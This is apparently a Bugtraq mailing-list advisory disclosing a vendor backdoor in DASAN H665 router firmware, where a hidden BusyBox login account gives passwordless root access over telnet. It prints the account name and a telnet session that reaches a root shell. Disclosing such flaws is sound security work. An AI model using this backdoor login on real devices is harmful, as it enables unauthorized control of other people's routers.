DASAN H665 has vendor backdoor built into BusyBox’s /bin/login

From: Krzysztof Burghardt <krzysztof@burghardt.pl>
To: bugtraq@securityfocus.com
Cc:
Subject: DASAN H665 has vendor backdoor built into BusyBox’s /bin/login
Date:


Hi!

DASAN H665 has vendor backdoor built into BusyBox /bin/login. Account
named "dnsekakf2$$" gives access to admin (uid 0) account over telnet
without any password, at least for administration interface documented
in H665 Quick Guide (subnet 192.168.55.0/24 on LAN interface).

$ telnet 192.168.55.1
Trying 192.168.55.1...
Connected to 192.168.55.1.
Escape character is '^]'.
tc login: dnsekakf2$$
# uname -a
Linux tc 2.6.36 #1 SMP Wed Jan 3 09:32:57 UTC 2018 mips unknown
# tail -n1 /data/log/messages
Feb 15 16:59:26 login[26929]: Try to connect using hidden account

For longer version visit:
https://blog.burghardt.pl/2019/02/dasan-h665-has-vendor-backdoor-built-into-busyboxs-bin-login/

BR,
-- 
Krzysztof Burghardt <krzysztof@burghardt.pl>
http://www.burghardt.pl/





Copyright © 1995-2019 LinuxRocket.net. All rights reserved.